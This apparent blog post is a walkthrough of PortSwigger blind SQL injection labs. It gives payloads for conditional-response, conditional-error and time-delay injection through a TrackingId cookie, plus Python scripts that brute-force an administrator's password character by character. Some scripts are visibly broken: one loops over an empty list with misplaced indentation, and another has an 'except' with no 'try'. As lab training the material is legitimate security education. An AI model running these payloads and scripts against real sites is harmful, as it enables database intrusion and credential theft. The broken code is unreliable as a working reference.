Blind SQL with Python

  • |
  • 20 September 2021
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In this blog we will solve portswigger labs for Blind SQL injection with python

What is Blind SQL?

It’s type of SQL injection happens when the web application is vulnerable but the response doesn’t contain results signify of any database errors.

Blind SQL injection with conditional responses

First of all we have a web application that contain TrackingId (Cookie) in request header.

Cookie: TrackingId= ‘Value’

When the request contain TrackingId Cookie it means that the application determines whether this is a known user using SQL query.

SELECT TrackingId FROM <Table_name> WHERE TrackingId = 'value'

So this query is vulnerable to SQL injection but the result aren’t returned to the user, okay let’s see what we can do.

Note: I will solve Portswigger blind SQL labs to describe this techniques.

Firstly open your burpsuit and run your proxie

let’s test it with basic sql query and see the behavior of the application.


if we return to the web application we will see that “Welcom back” message is appeared.

let’s try false condition.


now we verify the payload, seconed step we will Enumerate for tables and i will using python for this.

ofa7'UNION SELECT 'a' FROM <Table_Name> WHERE 1=1--

I have a list of table names.

import requests
from sys import argv
url = "" #laburl
trust_string = "Welcome back"
result = ''
Table_name = argv[1]
names = open(Table_name,"r")
Try = list("")

for n in names:
print("[+] Extract Info")

for T in Try:
    payload = "ofa7'UNION SELECT 'a' FROM %s WHERE 1=1--" %T
    print("Trying Table Name : %s " %T)
    cookie = {"TrackingId":payload}
    response = requests.get(url, cookies=cookie)

    if trust_string in response.content.decode('utf-8'):
        print("[+] Result is : ", T)

we got the Table_Name : users

now let’s enumerate the columns, we need to know the column that the administrator is part of it. so the query will be.

ofa7'UNION SELECT 'a' FROM users WHERE %s="administrator"--

all we will do that change the payload from the code

and now we have Column_Name too : username

another way to enumerate columns:

ofa7'UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' And column_name LIKE '%s'—

Enumerate for second column.

to Enumerate for password length use:

ofa7'AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>%i)='a

final payload:

ofa7'UNION SELECT 'a' from users WHERE username = 'administrator' AND substring(password,%i,1)='%s'--
import requests
import string

characters = list(string.ascii_lowercase)
characters += list(string.digits)
url = "" #Target URL
length = 20
trust_string = "Welcome back!"
result = ''

print("[+] Extract Info")

for i in range(1, length+1):
    for char in characters:
    	payload = "ofa7'UNION SELECT 'a' from users WHERE username = 'administrator' AND substring(password,%i,1)='%s'--" %(i, char)
    	print("Trying Number %i with: " %(i), char)
    	cookie = {"TrackingId":payload}
    	response = requests.get(url, cookies=cookie)
    	if trust_string in response.content.decode('utf-8'):
    		result += char

    print("[+] Result is : ", result)

Blind SQL with conditional error

Password Length

'|| (SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM <TABLE> WHERE <Column> = '...')||'

Password BruteForce

'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
import requests
import string

characters = list(string.ascii_lowercase)
characters += list(string.digits)
url = "" #Target URL
length = 20
result = ''

print("[+] Extract Info")

for i in range(1, length+1):
    for char in characters:
        payload = "a'||(SELECT CASE WHEN SUBSTR(password,%i,1)='%s' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'" %(i, char)
        print("Tring Number %i with: " %(i), char)
        cookie = {"TrackingId":payload}
        response = requests.get(url, cookies=cookie)
        if response.status_code == 500:
            result += char

    print("[+] Result is : ", result)

Blind SQL injection with time delays and information retrieval

Microsoft SQL Server.

'; IF (1=2) WAITFOR DELAY '0:0:10'—



Blind SQL injection with time delays and information retrieval

import requests
import string
from requests.exceptions import Timeout

characters = list(string.ascii_lowercase)
characters += list(string.digits)
url = "" #Target URL
length = 20
result = ''

print("[+] Extract Info")

for i in range(1, length+1):
    for char in characters:
        payload = "a'%%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,%i,1)='%s')+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users--" %(i, char)
        print("Tring Number %i with: " %(i), char)
        cookie = {"TrackingId":payload}
            requests.get(url, cookies=cookie , timeout=5)
        except Timeout:
            result += char

    print("[+] Result is : ", result)

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